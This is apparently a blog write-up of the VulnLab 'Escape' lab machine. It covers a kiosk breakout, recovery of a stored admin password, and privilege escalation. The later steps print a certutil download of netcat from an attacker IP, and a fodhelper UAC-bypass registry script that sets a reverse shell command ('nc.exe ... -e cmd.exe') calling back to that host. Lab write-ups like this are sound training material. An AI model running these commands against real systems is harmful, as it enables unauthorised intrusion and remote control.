Post

VulnLab -- Escape Writeup

Posted Updated
Preview Image
By Remo
2 min read

Escape

Hello Friends,

Remo is Back

In this write-up, I’ll walk through how I pwned the Escape machine from VulnLab. From initial enumeration to gaining root access, I’ll explain the key steps, tools, and techniques used to complete the box.

image.png

Let’s start by scanning the machine.

1

sudo nmap -sC -sV -sS -O -A -oN scanned.txt -p 3389 --min-rate=1000 10.10.120.101

image.png

Now let’s try to connect to the RDP.

1

xfreerdp /v:10.10.120.101 -sec-nla

image.png

Notice that the message say to connect to the machine using username: KisokUser0 password: no password

so let’s connect to the RDP using the user KioskUser0

image.png

Now let’s go and open the edge bowser and search for the C directory

1

file:///c:/

image.png

notice that there is a folder named admin so let’s navigate to it!

image.png

notice that we got the password of the administrator.

Now let’s get the user flag by navigating to the users folder

1

file:///C:/Users/kioskUser0/Desktop/user_07eb46.txt

image.png

Now let’s get the admin password using the Remote Desktop Plus application.

Now let’s import the profile.xml to the application

image.png

Now let’s open BulltesPassView that will help recovering the password from bullet format

image.png

Now notice that now know that got the credentails username: admin password: Twisting3021

Now let’s go back to Microsoft edge and retrieve the cmd

1

file:///C:/Windows/System32/cmd.exe

image.png

now let’s view it in the download file

image.png

now rename the executable to msedge as this is allowed application to run

image.png

Now let’s run it

image.png

As we see we got access to the cmd!

Now let’s use run as and open cmd as the admin user

1

runas /user:Escape\admin cmd.exe

image.png

now let’s see our new user.

image.png

Now let’s see our privileges

1

whoami /all

image.png

Since we are in admin group admin medium integrity level we can do UAC bypass and gain full access

First let’s transfer net cat.

1

certutil -urlcache -f http://10.8.5.233/nc.exe nc.exe

image.png

Now let’s go and abuse the UAC and get full access reverse shell.

Start a listener

1

nc -lvnp 1337

image.png

Now let’s gain a shell

1

powerhsell -ep bypass

and paste this PowerShell script in the terminal

1
2
3
4

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.5.233 1337 -e cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

image.png

Now let’s go back to our listener.

image.png

we didn’t get anything 😞

But! we can run cmd to get admin privilege

1

Start-Process -Verb runas cmd.exe

image.png

Now let’s see our privs.

1

whoami /priv

image.png

and we got the full access

now let’s go to the root directory

1

cd c:\users\administrator\desktop

image.png

amazing we got the root flag!

image.png

That’s it for the Escape machine! This challenge was a great test of enumeration and exploitation skills. Hope you found the write-up useful.

Remo

CRTECRTPCRTOeWPTXeCPPTeMAPT
windows machine
kiosk
This post is licensed under CC BY 4.0 by the author.